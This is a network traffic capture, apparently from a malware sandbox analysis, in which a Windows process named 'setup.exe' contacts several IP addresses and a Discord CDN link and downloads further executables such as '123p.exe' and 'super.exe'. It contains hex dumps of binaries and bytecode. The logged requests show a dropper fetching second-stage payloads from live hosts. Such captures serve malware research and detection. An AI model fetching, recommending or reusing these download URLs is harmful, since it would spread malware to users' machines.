Jul 2, 2024 00:05:06.789666891 CEST	1236	IN	Data Raw: 00 06 3a ae fe ff ff 26 20 09 00 00 00 38 a3 fe ff ff 20 c0 09 00 00 28 af 70 00 06 13 2f 38 8a 02 00 00 20 fc 07 00 00 28 af 70 00 06 13 02 38 2c 01 00 00 20 0c 0b 00 00 28 e0 01 00 06 13 19 20 0e 00 00 00 28 e2 01 00 06 39 66 fe ff ff 26 38 5c Data Ascii: :& 8 (p/8 (p8, ( (9f&8\* (9M&8C.8. (9,&8" (9& 8Z (:&88! (9&8 8"
Jul 2, 2024 00:05:06.789679050 CEST	1236	IN	Data Raw: 16 13 1e 20 03 00 00 00 38 40 fe ff ff 17 13 2d 20 18 00 00 00 38 33 fe ff ff 1f 2c 13 0d 38 1e 02 00 00 20 7c 0c 00 00 28 e0 01 00 06 13 0e 20 21 00 00 00 38 14 fe ff ff 17 13 33 20 1f 00 00 00 38 07 fe ff ff 22 d5 cd 6b 41 13 1a 20 07 00 00 00 Data Ascii: 8@- 83,8 \|( !83 8"kA 8 (9&8 (8 (p$8n"B# (9& 8 8 8\|"AXB8K0 8b
Jul 2, 2024 00:05:06.789690018 CEST	1236	IN	Data Raw: 00 00 00 28 e1 01 00 06 3a dc fd ff ff 26 20 06 00 00 00 38 d1 fd ff ff 20 62 10 00 00 28 af 70 00 06 13 13 20 17 00 00 00 38 bb fd ff ff 16 13 0f 38 2d 01 00 00 16 13 2b 20 0b 00 00 00 28 e1 01 00 06 3a a1 fd ff ff 26 38 97 fd ff ff 17 13 25 38 Data Ascii: (:& 8 b(p 88-+ (:&8%8d"VB (:}&8s* 8j F("8\|8# 8D";=8"A/ 8'J8dW' 8S$ 8 \|(
Jul 2, 2024 00:05:06.789700031 CEST	1236	IN	Data Raw: 00 38 83 fd ff ff 17 13 11 38 dc 00 00 00 22 b2 cf 0b 42 13 06 38 15 ff ff ff 20 e2 17 00 00 28 e0 01 00 06 13 22 20 20 00 00 00 38 59 fd ff ff 20 34 17 00 00 28 e0 01 00 06 13 25 20 10 00 00 00 38 43 fd ff ff 17 13 08 20 07 00 00 00 28 e1 01 00 Data Ascii: 88"B8 (" 8Y 4(% 8C (91& 8&_+8"TMB18F#8$"]cB8s, 88G( (:& 8 (p8- (9&8$ 8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49715	80.78.242.100	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.748178959 CEST	198	OUT	HEAD /d/525403 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 80.78.242.100 Cache-Control: no-cache
Jul 2, 2024 00:05:06.482507944 CEST	356	IN	HTTP/1.1 302 Found Server: nginx Date: Mon, 01 Jul 2024 22:05:05 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67&
Jul 2, 2024 00:05:08.640455961 CEST	197	OUT	GET /d/525403 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 80.78.242.100 Cache-Control: no-cache
Jul 2, 2024 00:05:08.870512962 CEST	1236	IN	HTTP/1.1 302 Found Server: nginx Date: Mon, 01 Jul 2024 22:05:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67& Data Raw: 34 35 36 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 32 35 35 37 33 37 36 36 39 37 33 37 32 35 34 39 35 34 2f 31 32 35 37 34 35 35 34 36 33 30 38 38 33 39 34 34 30 34 2f 73 65 74 75 70 2e 65 78 65 3f 65 78 3d 36 36 38 34 37 38 32 38 26 69 73 3d 36 36 38 33 32 36 61 38 26 68 6d 3d 39 61 30 61 36 62 61 61 35 66 66 30 34 35 64 34 39 31 61 66 64 38 37 65 66 61 64 33 64 64 30 33 33 36 31 38 63 63 38 63 35 63 65 30 34 30 31 38 63 63 63 31 30 65 66 36 37 62 39 37 66 64 36 37 26 27 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 [TRUNCATED] Data Ascii: 456<html> <head> <meta name="referrer" content="no-referrer"> <meta http-equiv="Refresh" content="0; URL='https://cdn.discordapp.com/attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67&'"> <script> window.location.href="https://cdn.discordapp.com/attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67&"; </script> </head> <body> <a href="https://cdn.discordapp.com/attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67&" referrerPolicy="no-referrer" rel="noreferrer">click here</a>
Jul 2, 2024 00:05:08.870881081 CEST	174	IN	Data Raw: 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 Data Ascii: <script> self.location="https://cdn.discordapp.com/attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d4
Jul 2, 2024 00:05:08.960402012 CEST	96	IN	Data Raw: 39 31 61 66 64 38 37 65 66 61 64 33 64 64 30 33 33 36 31 38 63 63 38 63 35 63 65 30 34 30 31 38 63 63 63 31 30 65 66 36 37 62 39 37 66 64 36 37 26 22 3b 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a Data Ascii: 91afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67&"; </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49716	77.105.133.27	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.748539925 CEST	207	OUT	HEAD /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Cache-Control: no-cache
Jul 2, 2024 00:05:06.450875044 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 17 Jun 2024 13:05:54 GMT ETag: "a13400-61b15a0111080" Accept-Ranges: bytes Content-Length: 10564608 Content-Type: application/x-msdownload
Jul 2, 2024 00:05:06.451621056 CEST	206	OUT	GET /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Cache-Control: no-cache
Jul 2, 2024 00:05:06.667402983 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 17 Jun 2024 13:05:54 GMT ETag: "a13400-61b15a0111080" Accept-Ranges: bytes Content-Length: 10564608 Content-Type: application/x-msdownload Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 11 32 70 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 04 cd 00 00 00 00 00 3a c1 fa 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 91 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 c9 7c 01 3c 00 00 00 00 80 8e 01 d0 04 03 00 00 4d 8e 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 4d 7d 01 28 00 00 00 c0 4b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd2pf#:@ \|<M`*M}(K8@ .textv~ `.rdata@@.data@.pdata@@.00cfg@@.tls@.text0a% `.text1X@@.text2`'P(`h.rsrc.@@
Jul 2, 2024 00:05:06.667457104 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c a1 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 52 Data Ascii: R{
Jul 2, 2024 00:05:06.667470932 CEST	1236	IN	Data Raw: f4 e4 c9 55 f9 29 11 a1 83 63 ab 06 91 85 af e9 9d 54 f9 c8 c0 4a a1 06 72 05 76 4a 9f 33 05 c8 0f 27 73 5d e4 d2 57 c3 d6 8a 12 37 23 2f 50 97 7e 84 ea 79 d9 f7 d4 e8 83 7b d0 19 cf dc dd 92 b3 98 8b cf 87 67 5b 28 cf e9 ce 6d 72 e7 0b 25 f3 1f Data Ascii: U)cTJrvJ3's]W7#/P~y{g[(mr%blhH/dmXql^zN2Rw:=M@hiT'>kWw1/Gn\|dTRkj;3xx[``bMR}+jPf2aY2FQu$p6
Jul 2, 2024 00:05:06.667489052 CEST	1236	IN	Data Raw: ce 41 8a 01 52 d3 b7 28 3d 8a 69 fa ff bf 28 3d 8a c1 22 2f 67 28 3d 8a 39 d2 8b cf 28 3d 8a b1 5a ac 57 a6 0e a4 34 76 79 ef 0d 2b 26 04 1c b6 da 5b 13 e5 04 8a 25 79 7b 83 25 04 8a 25 13 b3 bb ad 04 8a 25 e3 33 b3 6d 04 8a 25 ea 0b 1b 8d 79 4b Data Ascii: AR(=i(="/g(=9(=ZW4vy+&[%y{%%%3m%yK#i~IHrkAZ({$nuA%'=ee'=v'=s'= XD{'HGUII2U1fu'(as~MfWQC?9HI%
Jul 2, 2024 00:05:06.667498112 CEST	256	IN	Data Raw: 16 ae cd 7d 64 32 ba 48 bf 8e f7 66 38 5c cc b8 48 22 a8 88 6a b7 8a a0 7b 9b 86 71 41 91 b7 c2 d9 36 79 5a d3 c9 81 8a 2c 5d 7e 68 8e 5b 59 36 1f a4 cc 82 05 7a ac 70 79 7f ac ef c2 10 22 ab 8e 92 5e 95 e6 df 55 e8 73 94 7e 95 32 00 4b 6a 51 dc Data Ascii: }d2Hf8\H"j{qA6yZ,]~h[Y6zpy"^Us~2KjQd@Z8 \1mfK{1iia{gK{#<=FBd86L.06G3vcHHgKs\cHJ&Y^eoHgz@d1jrA
Jul 2, 2024 00:05:06.771161079 CEST	1236	IN	Data Raw: 60 f2 bb df 56 b5 fe b6 93 63 a5 83 38 c3 86 4c 8e 6f a5 24 65 47 34 30 0f 58 32 db a8 63 33 0b a1 c9 2c 57 17 ff 05 93 37 d3 a8 9a 2a e0 26 57 98 af 7f 39 2a 65 f8 0f 72 51 d5 ad 63 48 98 d5 c1 7b e9 0f 70 de 9e d9 4f 12 30 e4 ee b2 32 8f c7 59 Data Ascii: `Vc8Lo$eG40X2c3,W7&W9erQcH{pO02Yt2&1E7t4S@_D<Du9Du{DuH6Du[9ksJ>h"d)t'\$3r2"uWAwR!=h"!=\l!=T!=^M6
Jul 2, 2024 00:05:06.771174908 CEST	1236	IN	Data Raw: 34 c2 41 ed 93 44 6c ee e0 35 64 10 63 43 c4 ff 75 56 25 df fb 41 8a 05 0e c1 b3 1d 3d 8a ed be 4d 03 1d 3d 8a 5d be 07 63 1d 3d 8a bd 26 c3 a3 1d 3d 8a dd 26 68 62 a6 0e 31 21 94 c8 59 c4 a6 b3 e6 ad 00 d6 86 f6 d8 e6 3b 93 2d 0e 46 f8 e6 3b 93 Data Ascii: 4ADl5dcCuV%A=M=]c=&=&hb1!Y;-F;V8;;,XgP6*'y\|BSuZ#AJ=Y3g=G=YU/=1b-x:oixJxjx:uk/jtp`Q73DVoEt
Jul 2, 2024 00:05:06.771186113 CEST	1236	IN	Data Raw: 18 22 07 4a ab c5 3d a0 22 07 4a 23 75 a4 f8 22 07 4a 4b 25 52 06 32 e8 3d cf 2e 51 db 63 10 00 36 a2 d0 2a d0 e5 6a 85 54 29 59 ec cf a3 70 ac eb a3 d7 7d bf 16 9c 4e 7b 54 e0 f2 79 74 9d 50 85 4a d4 89 7e da 54 8f 04 db 69 35 93 5f a5 06 3a b3 Data Ascii: "J="J#u"JK%R2=.Qc6*jT)Yp}N{TytPJ~Ti5_:C?ah-!+.{:PA~w3HyPdISy#.~#[CAVc!o&!b[jNCYK\|a /`[
Jul 2, 2024 00:05:06.771218061 CEST	1236	IN	Data Raw: 9a a2 4b fd bf 8b ee 31 89 60 ae 46 fa ec f3 bf 4f e6 34 4a ec f3 bf 3f c2 57 0a ec f3 bf 08 b2 3e e2 ec f3 bf e7 65 f7 40 df b3 34 4f 29 8f 66 04 cd dd 83 ff b1 59 94 aa 1a ef 37 a1 7a 76 df 56 5f 0b 8a 54 9e c7 09 ef 0f e2 55 e5 10 41 07 50 71 Data Ascii: K1`FO4J?W>e@4O)fY7zvV_TUAPq[>;J(FA@6QxVfH3c%"Hmp{dkVIxOUIJ8LWXN6`CK7_=V\|N
Jul 2, 2024 00:05:06.771229029 CEST	896	IN	Data Raw: 49 17 24 1a f2 1c 28 61 cc 38 30 df c1 23 6e a1 68 48 ac a2 f8 3a cf 90 eb aa 27 85 1e 06 a6 51 d2 5d 6a f9 76 f5 f8 5c 60 1d c4 31 11 a1 c0 33 54 a2 af 94 d2 67 c4 f0 88 8b 61 c3 72 9e 21 fa 2c 61 98 49 a3 07 7f 5f 90 5d f0 9a bd 4b 81 59 2d 3b Data Ascii: I$(a80#nhH:'Q]jv\`13Tgar!,aI_]KY-;O;Og3N;<i=U$^-c02YGfq1h,\(`@E@U.O)vKv]KV-\M!O`P
Jul 2, 2024 00:05:06.771537066 CEST	1236	IN	Data Raw: f1 31 89 66 e0 77 8c f3 f3 bf f6 dc 62 7c f3 f3 bf 99 a0 98 84 f3 f3 bf d6 dc b1 2c f3 f3 bf 29 7a f7 40 e1 9c 47 32 d7 6b 47 5d 2b 04 8c 81 1a df d8 c7 a9 e7 0f 82 9c 1c ef 41 e7 4f 12 9c 1c ef b1 97 0f 02 9c 1c ef b1 6f 78 b8 29 4d c6 9e 0c 00 Data Ascii: 1fwb\|,)z@G2kG]+AOox)MCN^-D_&"T2jeXY\2 q,2 qcrUv;3 ( K=$)9il[^]mZh+YYj4gF%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49717	77.91.77.80	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.748636961 CEST	203	OUT	HEAD /riana/super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.91.77.80 Cache-Control: no-cache
Jul 2, 2024 00:05:06.472654104 CEST	269	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:06 GMT Content-Type: application/octet-stream Content-Length: 2520576 Last-Modified: Mon, 01 Jul 2024 12:19:15 GMT Connection: keep-alive ETag: "66829ec3-267600" Accept-Ranges: bytes
Jul 2, 2024 00:05:06.473004103 CEST	202	OUT	GET /riana/super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.91.77.80 Cache-Control: no-cache
Jul 2, 2024 00:05:06.689192057 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:06 GMT Content-Type: application/octet-stream Content-Length: 2520576 Last-Modified: Mon, 01 Jul 2024 12:19:15 GMT Connection: keep-alive ETag: "66829ec3-267600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 24 fc be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 bf 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$JdZaaa5ZaaRichPELuf!$@ @ @@@0!@@Pp# @y#(@.dataP"B"4@
Jul 2, 2024 00:05:06.689239025 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a7 e1 3c 45 5e d4 96 c3 5e 4d 4a b8 f8 de aa 31 66 fb f1 7b 8b 81 c1 c0 92 Data Ascii: <E^^MJ1f{+L9t76kz&Z"i<HsdL i%'2cmKnl:_-+Kr3!7+0 W+p-(_P7MUR-W"ZYc[)AX<"@@
Jul 2, 2024 00:05:06.689249992 CEST	1236	IN	Data Raw: 2f f5 0d ee 5c 33 a3 20 41 1d 90 39 fb 42 38 0e 71 73 72 35 19 f2 c2 6f ca 46 fb 91 c2 d9 51 94 15 2f f1 77 dc 35 30 db 3c b7 86 c4 56 25 be bb 9c ac 72 c5 34 c2 42 97 81 d2 70 7f 18 71 6a 6b b9 a4 c9 32 31 14 3b 48 6e 13 eb be 02 9a 50 0c f9 df Data Ascii: /\3 A9B8qsr5oFQ/w50<V%r4Bpqjk21;HnP!H*62C#\|<" >dNQ4"vssy t@L=hZ(D=norFhCtV'-dP4!@@.U4hx_WOH!^(ec
Jul 2, 2024 00:05:06.689361095 CEST	1236	IN	Data Raw: 66 33 21 8f 40 10 d1 17 d6 60 2c a0 82 23 72 f3 ee b2 1e f6 66 10 47 ca a0 12 4b c8 b7 57 66 e8 06 0f d4 6f fd 93 5f 74 a4 9c dd 3a 0c 25 09 7f fd a6 ce e2 bb 89 dd e9 92 de 0f ef 3c e5 20 dc cc 22 68 06 57 80 18 74 9c a5 f6 1c ad 06 5b 71 1d c6 Data Ascii: f3!@`,#rfGKWfo_t:%< "hWt[q:tyi:f)cDRV[`oxo?_*R1-tDz`Nq}jNu?iRplK@iqQgZyj]b'+z[-.0l)!d'(L'L?;,
Jul 2, 2024 00:05:06.689373970 CEST	896	IN	Data Raw: cb 38 16 a5 7b c6 87 a9 11 06 a0 4f db d1 8f 34 3d 47 5e 00 05 69 54 a2 26 ed 86 fd fd 9a 9a 1d 36 f7 29 e9 0a 37 0f 09 03 06 8b 56 3d 89 94 2b 92 d0 de 48 67 9a 68 6d df c0 49 7d 14 c0 c2 7c 4c 21 79 1d 94 4a a2 c6 f9 28 1a ac 72 22 58 9d 1c 74 Data Ascii: 8{O4=G^iT&6)7V=+HghmI}\|L!yJ(r"Xt.\|\Q%V?QNg`N(b/Kni[+x'RmBvT=wl\|lz}5o}bI%RE0w(rugT::(0`jHE-@;
Jul 2, 2024 00:05:06.689384937 CEST	1236	IN	Data Raw: ad 53 c5 a5 01 96 5f 2b 77 e1 3d 3e 9c 6f e9 1e 71 dc 6a 92 92 74 bf a0 e7 58 74 6f 83 87 92 dd 5b 38 61 7b 31 8c e8 40 9c a1 28 d6 dc 00 bc 4e c7 d0 62 d0 7f 0c 89 1c de 2a 63 b4 ef 84 62 69 ef 23 71 e5 ff 55 e5 98 4b 59 88 f0 e5 ff c0 b7 f1 df Data Ascii: S_+w=>oqjtXto[8a{1@(Nbcbi#qUKY5{Y8h\|q>f_dFG(H8:plZ'-s8\kk}naPZm;/ui 31P#O!$y.Gu+9^mB&:[O&A{Hwyf"
Jul 2, 2024 00:05:06.689395905 CEST	1236	IN	Data Raw: 10 81 4d db 3b a9 89 1e 13 5f 1f 7b f2 cd a7 ad f0 22 42 4f 43 d2 ca 8a 11 d6 27 bf de 00 93 9b f4 9d 9b 18 62 b8 29 08 b1 2c 2f 6c 7e 19 dc f4 e1 53 2d 48 7f 6a 3b 2a 9d d0 24 9b 2b e7 5d 18 64 dd 33 eb 81 34 76 c8 b6 d6 0f 0c 5c 9b fe 6e fb 70 Data Ascii: M;_{"BOC'b),/l~S-Hj;$+]d34v\npff9Vuy,eM#<x7[,\V#eFtqA@Q;Ga+=OL)w1!RsZI/b<
Jul 2, 2024 00:05:06.689408064 CEST	1236	IN	Data Raw: 4c 40 f5 5b b6 86 b6 9b 28 88 cd 27 ed d1 eb 10 fd f6 43 63 f9 8c 5c 73 93 72 4f 23 25 70 41 70 be 3e 31 3e 4b e6 df a1 f4 43 b9 64 ee c4 d1 fa 83 5d 80 0a 3c e3 00 89 d0 20 cf 3e e0 c1 3a 10 ea 79 3e 69 b3 ec d4 3d b8 74 9b 4d 5f f5 71 be 89 da Data Ascii: L@[('Cc\srO#%pAp>1>KCd]< >:y>i=tM_q*pX1#\|G?8d+{X4/\|R/]<:pMZi\`\|-.-3J'/,ApQu[`fNyJJ1q6V]et;sf1Dr t
Jul 2, 2024 00:05:06.689614058 CEST	1236	IN	Data Raw: c1 20 27 d4 ae 48 8e 0c cf bf ef ac 38 df ec 4e eb 02 5f 0c 1e ed 48 1a b9 6c f4 37 c9 16 9b cf ea c0 2f d6 30 a8 3d 5d 7a f6 89 59 00 ce a7 91 75 b5 20 11 72 1f 3a 82 c5 93 7e f7 f6 b5 c5 76 83 f3 ef c2 9f 17 11 0d e5 71 4a c7 9a 90 39 76 ad f5 Data Ascii: 'H8N_Hl7/0=]zYu r:~vqJ9v#i)?L5=pCCR=o!lPX\|\\|k:8Iv3@W>9R\"n@auWz_oKN95{\&dk=Al[[=<
Jul 2, 2024 00:05:06.689625978 CEST	1236	IN	Data Raw: 32 7c 5d 0f c4 83 8a 0c b5 4a 13 95 87 d1 02 ec b0 00 97 47 b8 58 15 50 7c f2 42 2f de 46 98 0d 26 6a 7c 2d 7a 07 a2 8e 67 f6 89 78 08 7f e6 d6 a0 ff ee 12 dc bb 09 ca 3c 7b ed 43 56 97 f4 ab 0b 7f f1 c5 7d e4 8e 2e a5 52 b6 24 fe ba e6 6a 79 5b Data Ascii: 2\|]JGXP\|B/F&j\|-zgx<{CV}.R$jy[7sUiT0_FJ]t$+XG~`@=7rgZ~"A3&Db>SU>.FI_!>yh]`5KwVP:[,E%0t[N_-P+}_nt#<6fP#
Jul 2, 2024 00:05:06.690002918 CEST	1236	IN	Data Raw: a3 02 ec b1 f4 a9 69 68 7e b4 e2 1e 5d e2 98 0b bf 4c 45 78 63 0f 94 ac 4c e4 a3 a0 5b a9 d8 29 44 c2 8d 8f ec 0a 6c 78 67 48 5a 22 45 5d 60 05 f7 e4 23 4d 32 c9 f5 42 cf 33 24 7e 85 93 fb cf e3 e2 19 f0 d4 b2 7b 65 21 c3 bc 9f 4a 98 01 59 2e e7 Data Ascii: ih~]LExcL[)DlxgHZ"E]`#M2B3$~{e!JY.NkLf_EJn(NWcb;w<X_w>:: >53<?? ~1!mvkYNtNQ,eVdtPMrn07Ipi:XS0Im>%n+U5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49718	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.753504992 CEST	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 83 28 11 70 63 94 74 7b 9b c9 23 c5 b5 65 f3 0e 9a 7e 9e 64 90 fc bf 04 a2 6e 4e 16 dd c0 a4 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f(pct{#e~dnN&,+0/$#('=<5/Lvk.com#
Jul 2, 2024 00:05:06.447572947 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:06 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49719	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.753659010 CEST	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 83 28 11 fa 13 35 2c 06 79 9d 15 b5 e3 52 0a 58 49 4f e8 93 aa 6d e4 6e 57 e1 66 17 21 73 f9 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f(5,yRXIOmnWf!s&,+0/$#('=<5/Lvk.com#
